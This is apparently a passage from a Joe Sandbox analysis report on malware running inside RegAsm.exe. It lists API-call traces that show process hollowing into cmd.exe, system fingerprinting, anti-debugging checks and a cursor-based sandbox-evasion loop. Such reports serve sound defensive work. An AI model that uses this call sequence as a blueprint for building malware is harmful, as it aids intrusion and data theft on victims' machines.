                                                                • API String ID: 1802918048-1441494722
                                                                • Opcode ID: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                • Instruction ID: d36f890e74e7e8ef669b83a96deb31b174d36e7948efbde015f1e97a0a99ead9
                                                                • Opcode Fuzzy Hash: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                • Instruction Fuzzy Hash: B941AFB1A042289BCB249F749D85ADEBAB9EF19308F0000EAF109E3121E6758FD58F54
                                                                APIs
                                                                • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CrackInternet
                                                                • String ID:
                                                                • API String ID: 1381609488-0
                                                                • Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                • Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
                                                                • Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                • Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94
                                                                APIs
                                                                  • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                  • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                  • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                  • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateCrackHeapInternet
                                                                • String ID: GET$\xA
                                                                • API String ID: 1086229106-571280152
                                                                • Opcode ID: baa2dc263a1b6845e1dbba7907f855f2c15fc2d89a61f68a7661ccb89eda7454
                                                                • Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
                                                                • Opcode Fuzzy Hash: baa2dc263a1b6845e1dbba7907f855f2c15fc2d89a61f68a7661ccb89eda7454
                                                                • Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55
                                                                APIs
                                                                • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                • _memset.LIBCMT ref: 004116CE
                                                                  • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                  • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CurrentProfile_memsetmallocstrncpy
                                                                • String ID: Unknown
                                                                • API String ID: 455225556-1654365787
                                                                • Opcode ID: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                • Instruction ID: 5196d0f985b73c0c8bd0bad26c43f83b5151f3b6dc85e60399ef39d4da867d2e
                                                                • Opcode Fuzzy Hash: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                • Instruction Fuzzy Hash: 6F118671A0011CABCB21EB65DD86FDD73B8AB18704F4004A6B645F7191DAB8AFC88F58
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
                                                                • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: OpenQueryValue
                                                                • String ID: Windows 11
                                                                • API String ID: 4153817207-2517555085
                                                                • Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                • Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
                                                                • Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                • Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
                                                                • RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: OpenQueryValue
                                                                • String ID: CurrentBuildNumber
                                                                • API String ID: 4153817207-1022791448
                                                                • Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                • Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
                                                                • Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                • Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                • CreateToolhelp32Snapshot.KERNEL32(?,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                • Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFirstH_prolog3_catch_Process32SnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 1863932500-0
                                                                • Opcode ID: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                • Instruction ID: d2a27fa508e6c3a354df25509a6f4190b9582d57abc1eee0c1e907853c614cd1
                                                                • Opcode Fuzzy Hash: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                • Instruction Fuzzy Hash: 3B0162316002249BDB619B60DD44FEA76FD9B14301F8400E6E40DD2251EA798F949B25
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                • GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$AllocateComputerNameProcess
                                                                • String ID:
                                                                • API String ID: 1664310425-0
                                                                • Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                • Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
                                                                • Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
                                                                • Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: H_prolog3_catch
                                                                • String ID: ERROR
                                                                • API String ID: 3886170330-2861137601
                                                                • Opcode ID: f5cac69a8e03ad0b6c4e6e4e85c674d5d8d8f9bcd14ecaaf805fabf9f15bbc4a
                                                                • Instruction ID: af559da7a52deda925aca90371b7d636d26c87dd73bd3b1907a7f448f6be4e16
                                                                • Opcode Fuzzy Hash: f5cac69a8e03ad0b6c4e6e4e85c674d5d8d8f9bcd14ecaaf805fabf9f15bbc4a
                                                                • Instruction Fuzzy Hash: 6F119371900509AFCB40FF75D9025DDBBB1BF04308B90513AE414E3591E739EAA98FC9
                                                                APIs
                                                                • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: GlobalMemoryStatus
                                                                • String ID: %d MB
                                                                • API String ID: 1890195054-2651807785
                                                                • Opcode ID: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                • Instruction ID: b0b061f5290e25b68b6f7a4002290a0ac05d972f49bd8262d04e688218eddb93
                                                                • Opcode Fuzzy Hash: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                • Instruction Fuzzy Hash: 7801A9B1E00218ABEB08DFB4DC45EEEB7B9EF08705F44006AF602D7290EA75D9818759
                                                                APIs
                                                                • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileModuleName
                                                                • String ID: =A
                                                                • API String ID: 514040917-2399317284
                                                                • Opcode ID: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                • Instruction ID: 00f88837b3f4b8dbd17d966d98a560f1caae43d713f472eddac2d47ecb876e1e
                                                                • Opcode Fuzzy Hash: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
                                                                • Instruction Fuzzy Hash: D8F0B471600218ABDB24EB68DC45FEE7BBC9B48B08F00006AF645D7180EEB5DAC5CB55
                                                                APIs
                                                                • CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateObjectSingleThreadWait
                                                                • String ID:
                                                                • API String ID: 1891408510-0
                                                                • Opcode ID: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                • Instruction ID: 5b264aedade7dddb2649676fe5ff4aca135c6ea40ecc08e40dc523016e9b5da3
                                                                • Opcode Fuzzy Hash: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                • Instruction Fuzzy Hash: EC213B72900218ABCF14EF96E9459DE7BB9FF40358F11512BF904A3151D738EA86CF98
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: OpenQueryValue
                                                                • String ID:
                                                                • API String ID: 4153817207-0
                                                                • Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                                • Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
                                                                • Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                                • Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60
                                                                APIs
                                                                • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocLocal
                                                                • String ID: 1iA
                                                                • API String ID: 3494564517-1863120733
                                                                • Opcode ID: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                • Instruction ID: dc66f3ebc75c526b8f29ca666c763a1a9938aadc44e5483d7dab6bcf02b3e8fe
                                                                • Opcode Fuzzy Hash: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                • Instruction Fuzzy Hash: 08E02B3AA41B201FC7724BAA8804AB7BB5A9FC2F61B18412BDF49CB324D535CC4182E4
                                                                APIs
                                                                • malloc.MSVCRT ref: 0041CBC9
                                                                  • Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
                                                                  • Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
                                                                  • Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1
                                                                • malloc.MSVCRT ref: 0041CC06
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: malloc$lstrcpylstrlen
                                                                • String ID:
                                                                • API String ID: 2974738957-0
                                                                • Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                • Instruction ID: ee4a01d13f6e4d683757beabffaaf009a5c9ff74aa08d02828624340765fdc95
                                                                • Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                • Instruction Fuzzy Hash: FBF0F0766482119BC7206F66EC8199BBB94EB447A0F054027EE08DB341EA38DC8083E8
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
                                                                • Instruction ID: 2c76b628124a1797fdce28c748a09696ce6250a2eaa67b4899ff399dadce2328
                                                                • Opcode Fuzzy Hash: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
                                                                • Instruction Fuzzy Hash: 96711675910312AFEF1ADF60FD088243BA7F70874BF10A426E91582270EB374A64EF55
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00410CDF
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: c7062ee0803dc682f4bd22a1f6830d1074b171fc43ac1dbb61c851727eb39e82
                                                                • Instruction ID: 3361d4878da1eea6239f97e2bf75980f5f1ac49a34b78f17876420eca4585326
                                                                • Opcode Fuzzy Hash: c7062ee0803dc682f4bd22a1f6830d1074b171fc43ac1dbb61c851727eb39e82
                                                                • Instruction Fuzzy Hash: 4DF031B1900218BBDF14DFE59C059BF77BDAB0C616F001095F941E2180E6399A80D775
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: /$UT
                                                                • API String ID: 0-1626504983
                                                                • Opcode ID: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                • Instruction ID: 63eef66cd8fe0e336db70064ed11a5ad7b696d25642cb4984019eb1642be8bef
                                                                • Opcode Fuzzy Hash: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                • Instruction Fuzzy Hash: 8E027DB19442698BDF21DF64CC807EEBBB5AF45304F0440EAD948AB242D7389EC5CF99
                                                                APIs
                                                                • _memset.LIBCMT ref: 0040F57C
                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 0040F5C4
                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F5E2
                                                                • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040F5F8
                                                                • WriteProcessMemory.KERNEL32(?,00000000,a-A,?,00000000), ref: 0040F627
                                                                • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0040F65D
                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040F684
                                                                • SetThreadContext.KERNEL32(?,00000000), ref: 0040F696
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryProcess$Write$ContextThread$AllocReadVirtual_memset
                                                                • String ID: C:\Windows\System32\cmd.exe$a-A
                                                                • API String ID: 1852632844-431432405
                                                                • Opcode ID: e1ccbe8c928e2f1c21e5e7053cc7bb29076fa0b0443f7d3298dfd20d4594a4fa
                                                                • Instruction ID: 0d24e25234c3a3ad141f65fc29eb95852bfeeab9a63bd67a8dcfe51b88e854c0
                                                                • Opcode Fuzzy Hash: e1ccbe8c928e2f1c21e5e7053cc7bb29076fa0b0443f7d3298dfd20d4594a4fa
                                                                • Instruction Fuzzy Hash: B5413872A00208AFEB11DFA4DC85FAAB7B9FF48705F144475FA01E6161E776AD448B24
                                                                APIs
                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
                                                                • _memset.LIBCMT ref: 004151E5
                                                                • GetDriveTypeA.KERNEL32(?), ref: 004151EE
                                                                  • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
                                                                  • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
                                                                  • Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _memset$Drive$LogicalStringsType
                                                                • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                • API String ID: 2132072831-147700698
                                                                • Opcode ID: 7bbfb83d683dda401e0b4031a2b5908d2ccda3928876b9befa689fcfaf94df2d
                                                                • Instruction ID: 002cc7b8fd832fc02ac953dee8a9373947a5751985c47ec76440b2e4c0201c02
                                                                • Opcode Fuzzy Hash: 7bbfb83d683dda401e0b4031a2b5908d2ccda3928876b9befa689fcfaf94df2d
                                                                • Instruction Fuzzy Hash: 1B512DB190021CAFDF219FA1CC85BDA7BB9FB09304F1041AAEA48A7111E7355E89CF59
                                                                APIs
                                                                • OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00401823
                                                                • SetThreadDesktop.USER32(00000000), ref: 0040182A
                                                                • GetCursorPos.USER32(?), ref: 0040183A
                                                                • Sleep.KERNEL32(000003E8), ref: 0040184A
                                                                • GetCursorPos.USER32(?), ref: 00401859
                                                                • Sleep.KERNEL32(00002710), ref: 0040186B
                                                                • Sleep.KERNEL32(000003E8), ref: 00401870
                                                                • GetCursorPos.USER32(?), ref: 0040187F
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CursorSleep$Desktop$InputOpenThread
                                                                • String ID:
                                                                • API String ID: 3283940658-0
                                                                • Opcode ID: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
                                                                • Instruction ID: 6ce610161f310883e20b46de56f80fe1d7998de54b5bc585690095a2dc5f2f67
                                                                • Opcode Fuzzy Hash: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
                                                                • Instruction Fuzzy Hash: C9112E32E00209EBEB10EBA4CD89AAF77B9AF44301F644877D501B21A0D7789B41CB58
                                                                APIs
                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,?,?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B10B
                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,?,?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B134
                                                                • GetACP.KERNEL32(?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B148
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: ACP$OCP
                                                                • API String ID: 2299586839-711371036
                                                                • Opcode ID: 6f20a6a568b6e14900c222ba86026eddd2a2274cf4f13b45eb98a022f40272da
                                                                • Instruction ID: 9a82d2d165bf88aca29a0bf8e749ef3f3ea21aabb57aac8d650cc6d961d67086
                                                                • Opcode Fuzzy Hash: 6f20a6a568b6e14900c222ba86026eddd2a2274cf4f13b45eb98a022f40272da
                                                                • Instruction Fuzzy Hash: 8901B531701626BAEB219B60BC16F6B77A8DB043A8F60002AE101E11C1EB68CE91929C
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32 ref: 0041D44E
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041D463
                                                                • UnhandledExceptionFilter.KERNEL32(0043332C), ref: 0041D46E
                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0041D48A
                                                                • TerminateProcess.KERNEL32(00000000), ref: 0041D491
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                • String ID:
                                                                • API String ID: 2579439406-0
                                                                • Opcode ID: f0bae7c02ec03e9cd254ee3e77ce7dcb23bfee01a8b87353ff1e7fdac0599424
                                                                • Instruction ID: db72b0d0349af5086fa5416fb06d4d65b4d62ee2eec0edc44458765686740910
                                                                • Opcode Fuzzy Hash: f0bae7c02ec03e9cd254ee3e77ce7dcb23bfee01a8b87353ff1e7fdac0599424
                                                                • Instruction Fuzzy Hash: 1921ABB4C01705DFD764DFA9F988A447BB4BF08316F10927AE41887262EBB4D9818F5E
                                                                APIs
                                                                • GetLocalTime.KERNEL32(?,74DE83C0,00000000,?,?,?,?,?,?,?,?,0041C5A4,?), ref: 0041C13E
                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0041C5A4,?), ref: 0041C14C
                                                                  • Part of subcall function 0041B92A: FileTimeToSystemTime.KERNEL32(?,?,?,?,0041C211,?,?,?,?,?,?,?,?,?,?,0041C5B4), ref: 0041B942
                                                                  • Part of subcall function 0041B906: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041B923
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID:
                                                                • API String ID: 568878067-0
                                                                • Opcode ID: e18be1e8a3847ab2d69564342152f85ca1bd5b155455464045d2105bdf40e3da
                                                                • Instruction ID: e9dd666d6f03e3bc2370fb34bb5a4ee32d8a7198e314cb59bed8413d438bc6b2
                                                                • Opcode Fuzzy Hash: e18be1e8a3847ab2d69564342152f85ca1bd5b155455464045d2105bdf40e3da
                                                                • Instruction Fuzzy Hash: D421E6B19002099FCF44DF69D9806ED7BF5FF08300F1041BAE949EA21AE7398945DFA4
                                                                APIs
                                                                • EnumSystemLocalesA.KERNEL32(Function_0002B1C1,00000001), ref: 0042B56F
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EnumLocalesSystem
                                                                • String ID:
                                                                • API String ID: 2099609381-0
                                                                • Opcode ID: 50f329e47e560d397284a7460fab74257ebf44bd3fd5d611c322744838e49ff6
                                                                • Instruction ID: a965a9a856964b19ccfd622dabb5ac07b34b26fd65f40016140b6e3a2338ef0b
                                                                • Opcode Fuzzy Hash: 50f329e47e560d397284a7460fab74257ebf44bd3fd5d611c322744838e49ff6
                                                                • Instruction Fuzzy Hash: 20D05E71B50700ABD7204F30AD497B177A0EB20B16F70994ADC92490C0D7B865D58649
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_000275EC), ref: 00427633
                                                                Memory Dump Source
